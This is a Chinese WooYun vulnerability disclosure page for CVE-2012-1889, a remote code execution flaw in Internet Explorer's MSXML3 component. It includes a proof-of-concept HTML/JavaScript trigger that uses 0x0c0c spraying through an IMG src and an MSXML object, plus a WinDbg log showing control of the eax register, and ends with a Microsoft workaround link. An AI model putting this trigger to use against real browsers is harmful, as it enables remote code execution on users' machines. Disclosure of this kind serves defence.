当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08435

漏洞标题:IE暴雷0day漏洞(CVE-2012-1889)

相关厂商:微软

漏洞作者: 路人甲

提交时间:2012-06-18 16:43

修复时间:2012-06-18 16:43

公开时间:2012-06-18 16:43

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

IE暴雷0day漏洞(CVE-2012-1889)

详细说明:

IE暴雷0day漏洞(CVE-2012-1889),XML组件未名内存破坏漏洞。

漏洞证明:

from: http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html
使用DOM操作IMG节点的SRC设置nameProp属性填充调用栈,控制eax!

<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='ooxx'></object>
<script>
var obj = document.getElementById('ooxx').object;
var src = unescape("%u0c0c%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(0);
</script>


直接落入0c0c0c0c!!
0:024> g
(16d8.10a4): Unknown exception - code 8001010d (first chance)
ModLoad: 5dd50000 5de73000 C:\WINDOWS\system32\msxml3.dll
ModLoad: 3e350000 3e404000 C:\WINDOWS\system32\jscript.dll
(16d8.10a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00000000 ecx=5dda652c edx=00000001 esi=0c0c0c0c edi=0164d1c8
eip=5dd8d7d5 esp=0164ce68 ebp=0164cf84 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0x9f:
5dd8d7d5 8b08 mov ecx,dword ptr [eax] ds:0023:0c0c0c0c=????????

修复方案:

临时解决方案:
http://support.microsoft.com/kb/2719615
装微软推荐的安全软件:
http://technet.microsoft.com/en-us/security/advisorymapp
慢慢等微软补丁!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝